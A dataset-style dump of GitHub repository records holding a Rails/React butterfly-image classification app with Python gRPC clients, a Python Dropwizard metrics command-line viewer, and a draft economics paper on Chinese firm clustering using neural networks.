repo_name
stringlengths 5
114
| repo_url
stringlengths 24
133
| snapshot_id
stringlengths 40
40
| revision_id
stringlengths 40
40
| directory_id
stringlengths 40
40
| branch_name
stringclasses 209
values | visit_date
timestamp[ns] | revision_date
timestamp[ns] | committer_date
timestamp[ns] | github_id
int64 9.83k
683M
⌀ | star_events_count
int64 0
22.6k
| fork_events_count
int64 0
4.15k
| gha_license_id
stringclasses 17
values | gha_created_at
timestamp[ns] | gha_updated_at
timestamp[ns] | gha_pushed_at
timestamp[ns] | gha_language
stringclasses 115
values | files
listlengths 1
13.2k
| num_files
int64 1
13.2k
|
---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
Camp-Butterfly/backend | https://github.com/Camp-Butterfly/backend | 1e22203aa6dd2b68ea5126e5c9d58051d3f05fd0 | b2e1daee8d85a4b5b1278ffcfefd991a2137364e | f985c97f476a1d76dd03a79d7939cb2a37a07b22 | refs/heads/master | 2023-01-24T20:40:32.772110 | 2019-12-17T17:13:12 | 2019-12-17T17:13:12 | 212,698,411 | 0 | 0 | null | 2019-10-03T23:14:29 | 2019-12-17T17:57:17 | 2023-01-19T15:27:19 | Ruby | [
{
"alpha_fraction": 0.7189014554023743,
"alphanum_fraction": 0.723747968673706,
"avg_line_length": 22.80769157409668,
"blob_id": "fa29520b29197a5f360d8d62beb808205571901c",
"content_id": "8a45676ff9938fe485b60be28ff1f904051f86ad",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Ruby",
"length_bytes": 619,
"license_type": "no_license",
"max_line_length": 75,
"num_lines": 26,
"path": "/app/controllers/api/v1/butterflies_controller.rb",
"repo_name": "Camp-Butterfly/backend",
"src_encoding": "UTF-8",
"text": "class Api::V1::ButterfliesController < Api::V1::BaseController\n def index\n #respond_with Butterfly.all\n respond_with Butterfly.find_by(butterfly_name: params[:butterfly_name])\n end\n\n def create\n respond_with :api, :v1, Butterfly.create(butterfly_params)\n end\n\n def destroy\n respond_with Butterfly.destroy(params[:id])\n end\n\n def update\n butterfly = Butterfly.find(params[\"id\"])\n butterfly.update_attributes(butterfly_params)\n respond_with butterfly, json: butterfly\n end\n\n private\n\n def butterfly_params\n params.require(:butterfly).permit(:id, :butterfly_name, :description)\n end\nend\n"
},
{
"alpha_fraction": 0.568493127822876,
"alphanum_fraction": 0.568493127822876,
"avg_line_length": 18.954545974731445,
"blob_id": "e70efa353cfbe508b7b24550788e8235b6b603e7",
"content_id": "9dbeecb6f29de1cccad7b062edc896d6eadf34ac",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "JavaScript",
"length_bytes": 438,
"license_type": "no_license",
"max_line_length": 67,
"num_lines": 22,
"path": "/client/src/containers/ButterflyContainer.js",
"repo_name": "Camp-Butterfly/backend",
"src_encoding": "UTF-8",
"text": "import React, {Component} from 'react'\n// import './Query.css';\n\nclass Query extends Component {\n\n render() {\n\n\n return (\n <div className=\"query\">\n <div>Butterfly Name: {this.props.data.image_content} </div>\n <br/>\n <div>Scientific Name: {this.props.data.latitude} </div>\n <br/>\n <div>Image file name: {this.props.data.longitude} </div>\n\n </div>\n );\n }\n}\n\nexport default Query;"
},
{
"alpha_fraction": 0.8500000238418579,
"alphanum_fraction": 0.8500000238418579,
"avg_line_length": 19,
"blob_id": "cec3e305058b24524e15c60251fc9f6d767c1544",
"content_id": "9405a097cafe5c9731145e65bd43256f26546a94",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Ruby",
"length_bytes": 40,
"license_type": "no_license",
"max_line_length": 35,
"num_lines": 2,
"path": "/app/models/butterfly.rb",
"repo_name": "Camp-Butterfly/backend",
"src_encoding": "UTF-8",
"text": "class Butterfly < ApplicationRecord\nend\n"
},
{
"alpha_fraction": 0.7890625,
"alphanum_fraction": 0.7890625,
"avg_line_length": 31,
"blob_id": "09b3fe53381f25524fe487692a7047ef5ff80c60",
"content_id": "509c4b31c017638319d9bee08263364efb6567a9",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Ruby",
"length_bytes": 128,
"license_type": "no_license",
"max_line_length": 49,
"num_lines": 4,
"path": "/app/models/application_record.rb",
"repo_name": "Camp-Butterfly/backend",
"src_encoding": "UTF-8",
"text": "class ApplicationRecord < ActiveRecord::Base\n # mount_uploader :image_file_name, ImageUploader\n self.abstract_class = true\nend\n"
},
{
"alpha_fraction": 0.7021858096122742,
"alphanum_fraction": 0.7049180269241333,
"avg_line_length": 22.612903594970703,
"blob_id": "21f358d60a1c10aa6b43dc03c22be27e75ad7c10",
"content_id": "510acc8220846a72d75182953dbb01499c833286",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Ruby",
"length_bytes": 732,
"license_type": "no_license",
"max_line_length": 79,
"num_lines": 31,
"path": "/app/controllers/api/v1/images_controller.rb",
"repo_name": "Camp-Butterfly/backend",
"src_encoding": "UTF-8",
"text": "class Api::V1::ImagesController < Api::V1::BaseController\n\n# endpoint to retrieve all images stored in database.\n def index\n respond_with Image.all\n #respond_with Image.find params[:id]\n end\n\n# endpoint to create and classify image that runs a python script \n# to classify image using hosted docker container\n def create\n # creates new image in database \n Image.create(image_params)\n end\n\n def destroy\n respond_with Image.destroy(params[:id])\n end\n\n def update\n image = Image.find(params[\"id\"])\n image.update_attributes(image_params)\n respond_with image, json: image\n end\n\n private\n\n def image_params\n params.require(:image).permit(:id, :image_content, :longitude, :latitude)\n end\nend\n"
},
{
"alpha_fraction": 0.6721068024635315,
"alphanum_fraction": 0.7069733142852783,
"avg_line_length": 25.940000534057617,
"blob_id": "bb6c9f40e178469b868ff635226aa0876f792128",
"content_id": "aff161a18df66e86aed1bc0dc276e473ea037d8a",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1348,
"license_type": "no_license",
"max_line_length": 73,
"num_lines": 50,
"path": "/app/controllers/api/v1/grpc_client_EDIT.py",
"repo_name": "Camp-Butterfly/backend",
"src_encoding": "UTF-8",
"text": "from __future__ import print_function\n\nimport grpc\nimport numpy as np\nimport requests\nimport tensorflow as tf\nimport os\n\nfrom tensorflow_serving.apis import predict_pb2\nfrom tensorflow_serving.apis import prediction_service_pb2_grpc\nfrom tensorflow.keras.preprocessing import image\n \ndef main(channel):\n #Download image \n img = image.load_img(\"cabbage.jpg\", target_size=(150,150))\n img_tensor = image.img_to_array(img)\n img_tensor = np.expand_dims(img_tensor, axis=0)\n data = img_tensor\n\n print(data) \n\n options = [('grpc.min_reconnect_backoff_ms', 100)]\n channel = grpc.insecure_channel('192.168.99.100:8500', options=options)\n grpc.channel_ready_future(channel).result()\n stub = prediction_service_pb2_grpc.PredictionServiceStub(channel)\n #send request\n request = predict_pb2.PredictRequest()\n request.model_spec.name = 'testmodel'\n request.model_spec.signature_name = 'serving_default'\n request.inputs['input_image'].CopyFrom(\n tf.make_tensor_proto(data,shape=[1,150,150,3])\n )\n result = stub.Predict(request, 100.0)\n #channel.close()\n print(result)\n\n print('\\n')\n\n print(floats)\n floats = np.array(list(result.outputs['dense_1/Softmax:0'].float_val)) \n max_ = 0\n for i in range(0,3):\n if floats[i] > floats[max_]:\n max_ = i\n print(max_)\n\n return channel\n\nif __name__ == '__main__':\n tf.compat.v1.app.run()\n\n"
},
{
"alpha_fraction": 0.4348171651363373,
"alphanum_fraction": 0.4364069998264313,
"avg_line_length": 22.735849380493164,
"blob_id": "a0cda93311830496f7521e99a8555bd142d8020d",
"content_id": "c747da25f9760dfb095d38e602e3a405be3b6fda",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "JavaScript",
"length_bytes": 1258,
"license_type": "no_license",
"max_line_length": 53,
"num_lines": 53,
"path": "/client/src/App.js",
"repo_name": "Camp-Butterfly/backend",
"src_encoding": "UTF-8",
"text": "import React, {Component} from 'react';\nimport './App.css';\nimport SearchForm from './forms/SearchForm.js';\nimport ButterflyForm from './forms/ButterflyForm.js';\nimport ImageForm from './forms/ImageForm.js'\nimport {\n BrowserRouter as Router,\n Switch,\n Route,\n Link\n} from \"react-router-dom\";\n\n\nclass App extends Component {\n render() {\n return (\n <div className=\"App\">\n <header className=\"App-header\">\n <h2>Camp Butterfly</h2>\n </header>\n <Router>\n <ul>\n <li>\n <Link to=\"/\">Home</Link>\n </li>\n <li>\n <Link to=\"/add\">Add</Link>\n </li>\n <li>\n <Link to=\"/gallery\">Gallery</Link>\n </li>\n </ul>\n <Switch>\n {/* Home Page */}\n <Route exact path=\"/\">\n <SearchForm />\n </Route>\n {/* Add Butterfly */}\n <Route path=\"/add\">\n <ButterflyForm />\n </Route>\n {/* Add Image */}\n <Route exact path=\"/gallery\">\n <ImageForm/>\n </Route>\n </Switch>\n </Router>\n </div>\n );\n }\n}\n\nexport default App;\n"
},
{
"alpha_fraction": 0.761904776096344,
"alphanum_fraction": 0.773809552192688,
"avg_line_length": 27,
"blob_id": "80fa31e2c75b733d86b79801440316c97059fa0d",
"content_id": "a41f86fefb40390ed9d0887f541edfdd460ca13c",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Ruby",
"length_bytes": 84,
"license_type": "no_license",
"max_line_length": 53,
"num_lines": 3,
"path": "/app/controllers/api/v1/base_controller.rb",
"repo_name": "Camp-Butterfly/backend",
"src_encoding": "UTF-8",
"text": "class Api::V1::BaseController < ApplicationController\n respond_to :html, :json\nend\n"
},
{
"alpha_fraction": 0.8015872836112976,
"alphanum_fraction": 0.8015872836112976,
"avg_line_length": 30.5,
"blob_id": "31e5bf5c87fe77b72bada097118904d43cceb9bc",
"content_id": "95c13dbf9383ff9703d140f7e43fa6c6d5f81ccc",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Ruby",
"length_bytes": 126,
"license_type": "no_license",
"max_line_length": 50,
"num_lines": 4,
"path": "/app/models/image.rb",
"repo_name": "Camp-Butterfly/backend",
"src_encoding": "UTF-8",
"text": "class Image < ApplicationRecord\n\t# use ImageUploader for file upload in this model\n\t#mount_uploader :image, ImageUploader\nend\n"
},
{
"alpha_fraction": 0.4644850194454193,
"alphanum_fraction": 0.47412481904029846,
"avg_line_length": 25.280000686645508,
"blob_id": "602f1d60acccdcb0f5cd615abf6b1379f27bd869",
"content_id": "9d692fec8314a82abc85f62d728a0f3a613ac951",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "JavaScript",
"length_bytes": 3942,
"license_type": "no_license",
"max_line_length": 94,
"num_lines": 150,
"path": "/client/src/forms/ImageForm.js",
"repo_name": "Camp-Butterfly/backend",
"src_encoding": "UTF-8",
"text": "import React, {Component} from 'react'\nimport '../App.css';\nimport axios from 'axios';\n\n// for adding any image\n\nclass GalleryForm extends Component {\n constructor(props) {\n super(props);\n this.state = {\n image_content: '',\n latitude: '',\n longitude: ''\n };\n this.updateImage = this.updateImage.bind(this);\n this.addImage = this.addImage.bind(this);\n }\n\n updateImage(event) {\n const target = event.target;\n let value = target.value;\n\n const name = target.name;\n this.setState({\n [name]: value\n });\n // console.log(\"pathname\");\n // console.log(value.readAsDataURL);\n // var filename = value.replace(/^.*\\\\/, \"\");\n // console.log(filename);\n }\n\n async addImage(event) {\n event.preventDefault();\n \n // map props to image object\n let new_image = { \n \"image_content\": this.state.image_content,\n \"longitude\": this.state.longitude,\n \"latitude\": this.state.latitude,\n };\n let response = ''\nconsole.log(new_image);\n //await axios.post(\"http://enigmatic-spire-53426.herokuapp.com/api/v1/images?\", new_image)\n //await axios.post(\"https://serene-wildwood-86252.herokuapp.com/api/v1/model\", new_image)\n await axios.post(\"http://127.0.0.1:5000/api/v1/model\", new_image)\n .then(result => {\n // this.setState({result:result.data});\n response = result.data\n console.log(result.data);\n })\n .catch(error => {\n if(error.response) {\n console.log(error.response);\n }\n });\n let id = ''\n // check id of response\n if (response === 0) {\n id = 'cabbage'\n }\n else if (response === 1) {\n id = 'ringlet'\n }\n else if (response === 2) {\n id = 'sulphur'\n }\n else if (response === 3) {\n id = 'milkweed'\n }\n else {\n id = 'none'\n //this.setState({result: id})\n }\n\n // conditional Query the backend API for the database\n if(id != 'none') {\n //let search = \"http://localhost:3001/api/v1/butterflies.json/\";\n let search = \"https://enigmatic-spire-53426.herokuapp.com/api/v1/butterflies.json/\";\n axios.get(search, {\n params: {\n butterfly_name: id\n }\n })\n .then(result => {\n this.setState({result:result.data});\n console.log(result.data);\n }); \n } \n }\n\n// basic add image form\n render() {\n return (\n <form className=\"add-form\">\n <label>\n Add Image:\n </label>\n <br/>\n <label>\n Image Content:\n </label>\n <input\n className=\"name\"\n type=\"string\"\n name=\"image_content\"\n value={this.state.value}\n onChange={this.updateImage}\n />\n <label>\n <br/>\n Longitude:\n </label>\n {/*<input\n className=\"name\"\n type=\"file\"\n name=\"longitude\"\n value={this.state.value}\n onChange={this.updateImage}\n />*/}<input\n className=\"name\"\n type=\"string\"\n name=\"longitude\"\n value={this.state.value}\n onChange={this.updateImage}\n />\n <br/>\n <label>\n Latitude:\n </label>\n <input\n className=\"name\"\n type=\"string\"\n name=\"latitude\"\n value={this.state.value}\n onChange={this.updateImage}\n />\n <br/>\n <button \n className=\"submit-button\"\n onClick={this.addImage}>\n Submit\n </button>\n </form>\n\n );\n }\n}\n\nexport default GalleryForm;\n"
},
{
"alpha_fraction": 0.6353383660316467,
"alphanum_fraction": 0.6372180581092834,
"avg_line_length": 30.294116973876953,
"blob_id": "3283147ec53dd262af5edb17f998c4fd668a9030",
"content_id": "aec27289047e8dc57c7ec266ee9b8352f50cc610",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Ruby",
"length_bytes": 532,
"license_type": "no_license",
"max_line_length": 76,
"num_lines": 17,
"path": "/config/routes.rb",
"repo_name": "Camp-Butterfly/backend",
"src_encoding": "UTF-8",
"text": "Rails.application.routes.draw do\n if Rails.env.development?\n mount GraphiQL::Rails::Engine, at: \"/graphiql\", graphql_path: \"/graphql\"\n end\n post \"/graphql\", to: \"graphql#execute\"\n\tnamespace :api do\n\t\tnamespace :v1 do\n\t\t# defines REST actions for images and butterflies\n # => GET, index\n # => POST, create\n # => DELETE, destroy\n # => PUT, update\n \tresources :images, only: [:index, :create, :destroy, :update]\n \tresources :butterflies, only: [:index, :create, :destroy, :update]\n \tend\n\tend\nend\n"
},
{
"alpha_fraction": 0.6736353039741516,
"alphanum_fraction": 0.7137050032615662,
"avg_line_length": 32.096153259277344,
"blob_id": "f3ffac67884907fce28414eb169c73b7504407f5",
"content_id": "498b01cce1967b92fe9eebf445660f60c9d0f2f7",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1722,
"license_type": "no_license",
"max_line_length": 93,
"num_lines": 52,
"path": "/app/controllers/api/v1/grpc_client_EDIT-1.py",
"repo_name": "Camp-Butterfly/backend",
"src_encoding": "UTF-8",
"text": "#from __future__ import print_function\n\nimport grpc\nimport numpy as np\nimport requests\nimport tensorflow as tf\nimport os\n\nfrom tensorflow_serving.apis import predict_pb2\nfrom tensorflow_serving.apis import prediction_service_pb2_grpc\nfrom tensorflow.keras.preprocessing import image\n\ndef main(channel):\n\n # Download image \n img = image.load_img(\"cabbage.jpg\", target_size=(150,150))\n # map to tensor array\n img_tensor = image.img_to_array(img)\n # Assign dimensions\n img_tensor = np.expand_dims(img_tensor, axis=0)\n # pass into workable variable\n data = img_tensor\n # mapped image\n print(data) \n \n # establish channel to docker image container\n # local container\n #channel = grpc.insecure_channel('192.168.99.100:8500') #local IP, testmodel, input_image\n #channel = grpc.insecure_channel('34.68.117.217:8500') #test2, test2, input_image\n channel = grpc.insecure_channel('35.193.112.218:8500') #model, model, conv2d_input\n grpc.channel_ready_future(channel).result()\n # create variable for service that sends object to channel\n stub = prediction_service_pb2_grpc.PredictionServiceStub(channel)\n # assign values to props of request\n request = predict_pb2.PredictRequest()\n # local container\n #request.model_spec.name = 'testmodel'\n #request.model_spec.name = 'test2'\n request.model_spec.name = 'model'\n request.model_spec.signature_name = 'serving_default'\n request.inputs['conv2d_input'].CopyFrom(\n \ttf.make_tensor_proto(data,shape=[1,150,150,3])\n )\n #send request to docker image container\n result = stub.Predict(request,10.0)\n # response from model\n print(result)\n\n\n# creates python executable\nif __name__ == '__main__':\n tf.compat.v1.app.run()\n\n"
},
{
"alpha_fraction": 0.6369400024414062,
"alphanum_fraction": 0.6475063562393188,
"avg_line_length": 19.19658088684082,
"blob_id": "ca89bdf4670889b6dec3c02f30a16feed4a32d8f",
"content_id": "8e9c66791f7700967d540afb6a60a85145dbf59d",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 2366,
"license_type": "no_license",
"max_line_length": 182,
"num_lines": 117,
"path": "/README.md",
"repo_name": "Camp-Butterfly/backend",
"src_encoding": "UTF-8",
"text": "## DOCUMENTATION \n\n#### __installation steps for frontend__\n\npackage manager:\n\t\n`brew install yarn`\n\njavascript packages:\n\t\n`brew install node`\n\ntracks changes in development:\n\t\n`brew install watchman`\n\n`brew tap AdoptOpenJDK/openjdk`\n\n`brew cask install adoptopenjdk8`\n\ncommand-line-tools for react-native:\n\t\n`npm install -g react-native-cli`\n\nstart development server:\n\n`react-native run-ios`\n\n\n#### __installation steps for backend__\n\nRuby on Rails application that provides a backend API for the application.\n\nIf Ruby is not installed on your machine, you can follow DigitalOcean's walkthrough: https://www.digitalocean.com/community/tutorials/how-to-install-ruby-on-rails-with-rbenv-on-macos\n\ncd into _/backend_ directory and run the following commands:\n\n_sets up backend_\n\n`rake db:setup`\n\n_create postgres models_\n\n`rails db:migrate`\n\n_insert seed data into local backend server_\n\n`rake db:seed`\n\n_start development server_\n\n`rails server`\n\nif you visit `http://localhost:3001` in any browser, the default homepage of ruby on rails should be visible.\n\n#### POST\n\n```\n\turl: \"http://localhost:3001/api/v1/images\",\n\ttype: \"POST\",\n\tdata: { image: { image_name: name, butterfly_name: b_name, location: location }\t}\n\tsuccess: response => {\n\t}\n```\n\n```\n\turl: \"http://localhost:3001/api/v1/butterflies\",\n\ttype: \"POST\",\n\tdata: { butterfly: { butterfly_name: b_name, scientific_name: s_name, image_file_name: i_name, description: desc }\t}\n\tsuccess: response => {\n\t}\n```\n\n#### GET\n\n```\n\t.getJSON(\"http://localhost:3001/api/v1/images.json\", (response) => { this.setState({ butterflies: response})\t});\n\t\n\t.getJSON(\"http://localhost/api/v1/butterflies.json\", (response) => { this.setState({ butterflies: response})\t});\n```\n\n#### DELETE\n\n```\n\turl: `/api/v1/images/${id}`,\n type: 'DELETE',\n success(response) {\n console.log('successfully removed item')\n }\n```\n\n\n```\n\turl: `/api/v1/butterflies/${id}`,\n type: 'DELETE',\n success(response) {\n console.log('successfully removed item')\n }\n```\n\n#### UPDATE\n\n```\n\turl: `/api/v1/images/${id}`,\n type: 'PUT',\n success(response) {\n console.log('successfully removed item')\n }\n```\n\n```\n\turl: `/api/v1/butterflies/${id}`,\n type: 'PUT',\n success(response) {\n console.log('successfully removed item')\n }\n```\n\n\n\n"
},
{
"alpha_fraction": 0.4745003581047058,
"alphanum_fraction": 0.4765678942203522,
"avg_line_length": 25.381818771362305,
"blob_id": "d7865bca773c0df42b7dc5ff68f09d026abe34dc",
"content_id": "ee29f053556b53e7175b03f5e1c336c6c0618485",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "JavaScript",
"length_bytes": 2902,
"license_type": "no_license",
"max_line_length": 102,
"num_lines": 110,
"path": "/client/src/forms/ButterflyForm.js",
"repo_name": "Camp-Butterfly/backend",
"src_encoding": "UTF-8",
"text": "import React, {Component} from 'react'\nimport '../App.css';\nimport axios from 'axios';\n\n// for adding a butterfly type\n\nclass AddForm extends Component {\n constructor(props) {\n super(props);\n this.state = {\n butterfly_name:'',\n scientific_name:'',\n image_file_name:'',\n description:''\n };\n this.updateItem = this.updateItem.bind(this);\n this.addItem = this.addItem.bind(this);\n }\n\n// updates component's object key-value pairs\n updateItem(event) {\n const target = event.target;\n const value = target.value;\n const name = target.name;\n this.setState({\n [name]: value\n });\n }\n\n// matches state params to object to be sent to server\n async addItem(event) {\n event.preventDefault();\n\n let new_butterfly = {\n \"butterfly_name\": this.state.butterfly_name,\n \"scientific_name\": this.state.scientific_name,\n \"image_file_name\": this.state.image_file_name,\n \"description\": this.state.description\n };\n //let data = JSON.stringify(new_butterfly,null);\n await axios.post(\"http://enigmatic-badlands-58618.herokuapp.com/api/v1/butterflies\", new_butterfly)\n .catch(error => {\n if(error.response) {\n console.log(error.response);\n }\n });\n }\n\n// basic add butterfly form\n render() {\n return (\n <form className=\"add-form\">\n <label>\n Add Butterfly:\n </label>\n <br/>\n <label>\n Butterfly name:\n </label>\n <input\n className=\"name\"\n type=\"string\"\n name=\"butterfly_name\"\n value={this.state.value}\n onChange={this.updateItem}\n />\n <label>\n Scientific name:\n </label>\n <input\n className=\"name\"\n type=\"string\"\n name=\"scientific_name\"\n value={this.state.value}\n onChange={this.updateItem}\n />\n <label>\n <br/>\n Attach Image:\n </label>\n <input\n className=\"name\"\n type=\"file\"\n name=\"attachment\"\n value={this.state.value}\n onChange={this.updateImage}\n />\n <br/>\n <label>\n Description\n </label>\n <input\n className=\"name\"\n type=\"text\"\n name=\"description\"\n value={this.state.value}\n onChange={this.updateItem}\n />\n <br/>\n <button \n className=\"submit-button\"\n onClick={this.addItem}>\n Submit\n </button>\n </form>\n );\n }\n}\n\nexport default AddForm;\n"
}
] | 14 |
burakdd/dwtop | https://github.com/burakdd/dwtop | 1a2da87d84b17c11dd2fab5e387fde6f85e336fc | 0894715c82e587a3e8abe9b3894196eb4d8f2258 | 5f74bb8804db2f0d7e8ec2accec18f9af66dc605 | refs/heads/master | 2016-03-31T01:57:33.694590 | 2015-08-02T19:35:10 | 2015-08-02T19:35:10 | 40,089,391 | 0 | 0 | null | null | null | null | null | [
{
"alpha_fraction": 0.676886796951294,
"alphanum_fraction": 0.676886796951294,
"avg_line_length": 31.615385055541992,
"blob_id": "7165d2e43f09d96d9c6276e8d842d5cf71b51de1",
"content_id": "bb97ea6141317e1b2999fb5699045b954a8598e8",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 848,
"license_type": "no_license",
"max_line_length": 109,
"num_lines": 26,
"path": "/README.md",
"repo_name": "burakdd/dwtop",
"src_encoding": "UTF-8",
"text": "Dwtop\n===\n[](https://travis-ci.org/burakdd/dwtop)\n\nDwtop is a simple command line tool for accessing your dropwizard metrics output and watch it in realtime.\n\nUsage\n===\n\n\tdwtop.py [-h] [--version] [--gauges] [--counters] [--histograms]\n\t [--meters] [--timers]\n\t hostname\n\t\n\tShow various outputs in real time from metrics server\n\t\n\tpositional arguments:\n\t hostname Hostname of the metrics server\n\t\n\toptional arguments:\n\t -h, --help show this help message and exit\n\t --version show version of metrics library\n\t --gauges show gauges data from metrics\n\t --counters show counters data from metrics\n\t --histograms show metrics histograms\n\t --meters show meters from metrics\n\t --timers show timers info from metrics\n"
},
{
"alpha_fraction": 0.5624306201934814,
"alphanum_fraction": 0.564927875995636,
"avg_line_length": 26.945735931396484,
"blob_id": "eed5ab274ca060a17de427b53d1771cbea48a72b",
"content_id": "700219e598bb00bbe82ea26807b6e62bbac6959b",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 3604,
"license_type": "no_license",
"max_line_length": 105,
"num_lines": 129,
"path": "/dwtop.py",
"repo_name": "burakdd/dwtop",
"src_encoding": "UTF-8",
"text": "# -*- coding:utf-8 -*-\nimport argparse\nimport urllib.request\nimport json\n\n\nclass DwNode:\n def __init__(self, hostname):\n self.hostname = hostname\n\n def __str__(self):\n return \"%s\\n\".format(self.hostname)\n\n def get_metrics_url(self):\n return \"\".join([self.hostname, \":\", \"8081\", \"/\", \"metrics\"])\n\n\nclass Metrics:\n def __init__(self, gauges, counters, histograms, meters, timers):\n self.gauges = gauges\n self.counters = counters\n self.histograms = histograms\n self.meters = meters\n self.timers = timers\n\n\ndef parse_cmd_args():\n \"\"\"\n Form some positional arguments and optional ones\n Parse them and form prerequisite objects\n :return:\n \"\"\"\n parser = argparse.ArgumentParser(description=\"Show various outputs in real time from metrics server\")\n # only required argument\n parser.add_argument(\"hostname\", help=\"Hostname of the metrics server\")\n\n # below are all optional\n parser.add_argument(\"--version\",\n action=\"store_true\",\n help=\"show version of metrics library\")\n parser.add_argument(\"--gauges\",\n action=\"store_true\",\n help=\"show gauges data from metrics\")\n parser.add_argument(\"--counters\",\n action=\"store_true\",\n help=\"show counters data from metrics\")\n parser.add_argument(\"--histograms\",\n action=\"store_true\",\n help=\"show metrics histograms\")\n parser.add_argument(\"--meters\",\n action=\"store_true\",\n help=\"show meters from metrics\")\n parser.add_argument(\"--timers\",\n action=\"store_true\",\n help=\"show timers info from metrics\")\n\n global args\n args = parser.parse_args()\n\n global node\n node = DwNode(args.hostname)\n\n\ndef get_metrics():\n \"\"\"\n Just make the actual request and parse json\n :return:\n \"\"\"\n global node\n metrics_url = node.get_metrics_url()\n with urllib.request.urlopen(metrics_url) as request:\n response_json = request.read()\n response_dict = json.loads(response_json.decode())\n global metrics\n metrics = Metrics(gauges=response_dict[\"gauges\"],\n timers=response_dict[\"timers\"],\n counters=response_dict[\"counters\"],\n histograms=response_dict[\"histograms\"],\n meters=response_dict[\"meters\"])\n\n\ndef print_gauges():\n for key in metrics.gauges:\n print(key, metrics.gauges[key][\"value\"], sep=\" => \")\n\n\ndef print_timers():\n for timer in metrics.timers:\n print(timer)\n print(\"=\" * 50)\n for key in metrics.timers[timer]:\n print(key, metrics.timers[timer][key], sep=\" => \")\n\n\ndef print_counters():\n for counter in metrics.counters:\n print(counter, metrics.counters[counter][\"count\"], sep=\" => \")\n\n\ndef print_histograms():\n pass\n\n\ndef print_meters():\n for meter in metrics.meters:\n print(meter)\n print(\"=\" * 50)\n for meter_type in metrics.meters[meter]:\n print(meter_type, metrics.meters[meter][meter_type], sep=\" => \")\n print(\"\\n\")\n\n\ndef pretty_print():\n if args.gauges:\n print_gauges()\n if args.timers:\n print_timers()\n if args.counters:\n print_counters()\n if args.histograms:\n pass\n if args.meters:\n print_meters()\n\n\nif __name__ == \"__main__\":\n parse_cmd_args()\n get_metrics()\n pretty_print()"
}
] | 2 |
iamlemec/landsat | https://github.com/iamlemec/landsat | 68023afd06e8b33abbd008561131ef372fc024a8 | df7a64487817607252b7fda310ebad21f38b27a8 | f6e5598bbd6c6d3b6546200ccb4875bee956c920 | refs/heads/master | 2021-06-23T20:37:11.751058 | 2020-12-07T16:29:04 | 2020-12-07T16:29:04 | 169,110,668 | 0 | 1 | null | null | null | null | null | [
{
"alpha_fraction": 0.7940738797187805,
"alphanum_fraction": 0.8136246800422668,
"avg_line_length": 135.87962341308594,
"blob_id": "efa6b8da6fb538b19746bcd28a0c837859d54f27",
"content_id": "d1b29463c6020ec296e6f851b3bb16b2184cf33d",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 14782,
"license_type": "no_license",
"max_line_length": 1358,
"num_lines": 108,
"path": "/draft/draft.md",
"repo_name": "iamlemec/landsat",
"src_encoding": "UTF-8",
"text": "#! Geographic Clustering of Firms: A Machine Learning Approach\n\nDouglas Hanley (University of Pittburgh)\nChengying Luo (University of Pittburgh)\nMingqin Wu (South China Normal University)\n\n# Abstract\n\nUnderstanding how the geographic arrangement of firms affects outcomes such as productivity and growth is a widely studied question in economics. Much of the literature has focused on constructing statistics that characterize firm clustering and using these as inputs into traditional regression analysis. In this paper, we use techniques developed in the field of machine learning (ML) to tackle this question. In particular, we employ convolutional neural networks (CNN) that are widely used in image classification tasks and apply them to the firm density maps considered in our setting. Using state-of-the-art techniques and tools from ML on comprehensive Chinese firm data, we find that such an approach has predictive power over and above traditional techniques. We investigate methods of interpreting such a complex algorithms analogous to the impulse response approach used with DSGE models. Additionally, we explore ways to account for confounding factors such as industry in our analysis, as well as to deal with issues of endogeneity of firm location choice through the use of instrumental variables.\n\n# Introduction\n\nThe spatial arrangement of firms is known to be a critical factor influencing a variety of firm level outcomes. Numerous existing studies have investigated the importance of firm density and localization at various spatial scales, as well as agglomeration by industry. In this paper, we bring relatively new data and techniques to bear on the issue.\n\nRegarding the data, we use a comprehensive census of firms conducted by the National Bureau of Statistics of China (NBS). This covers firms in all industries and localities, and we have waves from both 2004 and 2008 available. Past studies have largely relied on manufacturing firms This additional data allows us to look more closely at clustering within services, as well as potential spillovers between services and manufacturing. Further, by looking at the case of China, we get a snapshot of a country (especially in the early 2000s) in a period of rapid transition, but one that has already industrialized to a considerable degree. Additionally, this is an environment shaped by far more aggressive industrial policies than those seen in much of Western Europe and North America.\n\nIn terms of techniques, we take a machine learning approach to understanding firm clustering and agglomeration. Specifically, we use images generated by density maps of firm location data (from the NBS data) as well as linked satellite imagery from the Landsat 7 spacecraft. This allows us to frame the issue as one of prediction. By predicting firm outcomes such as profitability, productivity, and growth using these images, we can understand their relationship to firm clustering. By turning this into a prediction problem using images as inputs, we can tap into the rich and rapidly evolving literature in computer science and machine learning on deep convolutional neural networks (CNN). Additionally, we can utilize software and hardware tools developed for this purpose.\n\n# Data Overview\n\nOur firm data comes from the periodic survey of firms conducted by the Chinese NBS. In our case, we have waves from both 2004 and 2008. The 2004 wave constitutes roughly 1.5M firms, while the 2008 wave has considerably more with about 7.1M firms. For each firm we see a variety of aggregated statistics such as income and number of employees, the four digit industry in which they operate, their ownership structure (private or state-owned), amongst many others.\n\nWe also are given the address of the headquarters ^[In most cases this is a specific street address, but in some cases in is only the township, which is nonetheless rather specific.]. In the vast majority of cases where firms have a single establishment or plant, this address is the firms only operating location. Using this information, we are able to obtain the longitude and latitude for each firm to within about 100 meters. One issue is that these are given in the 